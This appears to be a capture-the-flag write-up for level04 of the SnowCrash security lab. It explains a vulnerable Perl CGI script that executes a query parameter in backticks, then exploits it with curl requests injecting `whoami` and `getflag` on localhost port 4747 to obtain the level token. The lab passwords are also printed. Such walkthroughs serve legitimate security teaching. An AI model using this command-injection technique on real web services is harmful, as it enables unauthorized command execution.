---
title:  "Snow-crash Level04"
excerpt: "Project SECURITY. This project is a modest introduction to the wide world of cyber security. A world where you’ll have no margin for errors."

tags:
  - [CyberSecurity,Github, Git]

toc: true
toc_sticky: true

date: 2024-2-13
last_modified_at: 2024-02-13
---

#### 1. The password of `level04` is the token that got from `level03`.

```
qi0maab88jeaj46qoumi7maus

```
#### 2. So, try login to `level04` with the password we got from `level03` and try to put the command 'ls -la'. We can see the file 'level04'. 
```
level03@SnowCrash:~$ su level04
Password:
level04@SnowCrash:~$
```
#### 3. Let's go inside in level04. 
```
level04@SnowCrash:~$ ls -la
total 16
dr-xr-x---+ 1 level04 level04  120 Mar  5  2016 .
d--x--x--x  1 root    users    340 Aug 30  2015 ..
-r-x------  1 level04 level04  220 Apr  3  2012 .bash_logout
-r-x------  1 level04 level04 3518 Aug 30  2015 .bashrc
-r-x------  1 level04 level04  675 Apr  3  2012 .profile
-rwsr-sr-x  1 flag04  level04  152 Mar  5  2016 level04.pl
level04@SnowCrash:~$ ./level04.pl
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
	LANGUAGE = (unset),
	LC_ALL = (unset),
	LC_TERMINAL_VERSION = "3.4.23",
	LC_CTYPE = "UTF-8",
	LC_TERMINAL = "iTerm2",
	LANG = "en_US.UTF-8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Content-type: text/html
```

We can see A file with `.pl` extension. 

So, what is a PL file? 

A file with .pl extension is a `Perl Script` file that is a scripting language. 

```
level04@SnowCrash:~$ cat level04.pl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));
```

This is a simple `CGI(Common Gateway Interface) script` that takes a parameter "x" from the query string and prints the result of runnig the command specified by the parameter using the `echo` commmand.

<details>
<summary> Note: What is CGI?  </summary>
<br>
What is CGI? : CGI, or Common Gateway Interface, is a standard interface that enables communication between a web server and external programs or scripts. It allows for the creation of dynamic web pages, processing user input, and interaction with databases.
</details>

<br>
<details>
<summary> Note: What is query?  </summary>
<br>
In the context of the Perl CGI script provided, the "query" refers to the string of parameters and their values that are passed to the script through the URL when it is accessed.
<br><br>
This string typically follows a question mark (?) in the URL and consists of key-value pairs separated by ampersands (&).
<br><br>
For example, if you access the script via a URL like this:
<br><br>

http://example.com/cgi-bin/script.cgi?x=ls%20-l

<br><br>
In this URL, the query string is x=ls%20-l. Here, x is the parameter name, and ls%20-l is its value. The %20 is a URL-encoded representation of a space character.
<br><br>
So, in this example, the query is x=ls%20-l, where the parameter x is assigned the value ls -l. When the Perl CGI script is executed with this query, it retrieves the value of the x parameter (ls -l in this case) and executes it as a command.
</details>

<br>
<details>
<summary> Details for the perl script </summary>
<br>

1. `#!/usr/bin/perl`: This is a hashebang line specifying the path to the Perl interpreter to be used to execute this script.
<br><br>

2. `use CGI qw{param};`: This line imports the param function from the CGI module. The param function is used to retrieve the values of parameters from the query string.
<br><br>

3. `print "Content-type: text/html\n\n";`: This line sends an HTTP header indicating that the content is of type "text/html". The double newline (\n\n) separates the header from the body.
<br><br>

4. `sub x { ... }`: This defines a subroutine (function) named "x". It takes one parameter and assigns its value to the variable $y.
<br><br>

5. `$y = $_[0];`: This line assigns the value of the first (in this case, only) argument passed to the subroutine to the variable $y.
<br><br>

6. `print echo $y 2>&1;`: This line prints the result of the command specified in $y. Backticks (``) are used to execute the command, and `2>&1` redirects both standard output and standard error to the output. This is a common technique to capture both normal output and error messages.
<br><br>

7. `x(param("x"));`: This line calls the subroutine "x" using the value of the "x" parameter from the query string.
<br><br>

In summary, the script takes a parameter named "x" from the query string, uses it as a command, executes the command, and prints the result.
<br>
</details>
<br>

We can see another interesting thing in that perl script.
The script indicates that 

```
# localhost:4747
```

Maybe, there is something on the port 4747. 

#### 4. Let's check on the port 4747. 

`nc -zv` allows to check connection to 4747 without sending any data and verbose mode.

<details>
<summary> What is 'nc' command in Linux </summary>
<br>
1. nc : This is the command itself, which is short for "netcat." Netcat is a versatile networking utility for reading from and writing to network connections using TCP or UDP protocols.
<br>
2.  -z: This option tells nc to scan for open ports rather than initiating a data transfer. When used with the -v option, it prints verbose output, indicating whether the connection was successful or not.
<br>
3.  -v: This option stands for "verbose" and instructs nc to provide more detailed output, including the status of each connection attempt.
<br>
So, when you run nc -zv, you are instructing Netcat to attempt to connect to a specified host and port without sending any data (-z), while also providing verbose output (-v) to show the result of each connection attempt. This is commonly used for port scanning to check if a port on a remote system is open or closed.
<br>
</details>
<br>

```
level04@SnowCrash:~$ nc -zv localhost 4747
Connection to localhost 4747 port [tcp/*] succeeded!
```

#### 5. Now, combine numbers 3 and 4 and  let’s send data using the `x parameter` and `port 4747` with `curl` command.


```
level04@SnowCrash:~$ curl 'localhost:4747/level04.pl?x=`whoami`'
flag04
```

We got the `Flag04` with the whoami parameter.

Maybe we can try again with x parameter with getflag. And here we go, we got the flag :)
```
level04@SnowCrash:~$ curl 'localhost:4747/level04.pl?x=`getflag`'
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```


#### 6. We got a token for next level05

```
ne2searoevaevoem4ov4ar8ap
```
